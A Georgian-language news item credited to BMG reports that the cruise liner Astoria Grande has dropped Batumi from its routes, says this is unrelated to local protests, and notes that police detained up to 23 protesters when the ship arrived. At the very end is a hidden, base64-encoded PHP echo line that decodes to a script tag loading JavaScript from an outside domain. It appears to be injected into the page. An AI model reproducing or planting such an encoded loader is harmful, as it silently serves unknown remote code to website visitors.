celsiusi
ავერსი შნაიდერი

"ბათუმში ტურები აღარ გვექნება", - ამის შესახებ საკრუიზო ლაინერ Astoria Grande-ში BMG-ის განუცხადეს. მათი თქმით, კომპანიის აგვისტოდან დაგეგმილ ტურებში აჭარა გათვალისწინებული არ იყო და ბათუმი აქამდე დამატებით მარშრუტად იყო ჩასმული.

BMG-ის კითხვაზე, კომპანიის გადაწყვეტილება უკავშირდება თუ არა ბათუმში მიმდინარე პროცესებს, აღნიშნეს, რომ საქართველოს მოქალაქეების პროტესტი ფაქტთან კავშირში არ არის.

"საპროტესტო აქციები არაფერ შუაშია. ბათუმი დამატებით მარშრუტად იყო ჩასმული. ბოლო, 29 ივლისს დაწყებული ტურის შემდეგ, სიაში ეს ქალაქი არ გვქონია. მომავალში კრუიზით საქართველოში გაჩერება არ იგეგმება”, - განაცხადეს Astoria Grande-ში.

ცნობისთვის, საკრუიზო ლაინერის ვებგვერდზე ტურისტული მარშრუტების სიაში ბათუმი აგვისტოში მართლაც აღარ ჩანს. 

Astoria Grande ბათუმში დღეს დილით ჩამოვიდა, რომელსაც მოქალაქეები საპროტესტო აქციით დახვდნენ. ადგილზე მთელი ღამის განმავლობაში მობილიზებული იყო პოლიცია, რომელმაც 23-მდე პირი დააკავა. ლაინერი საქართველოში პირველად 27 ივლისს შემოვიდა. მოქალაქეებმა საკრუიზო გემის ჩამოსვლა მაშინაც გააპროტესტეს და გემმა პორტი პროტესტის ფონზე დატოვა. 

 

წყარო: BMG

 

525
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");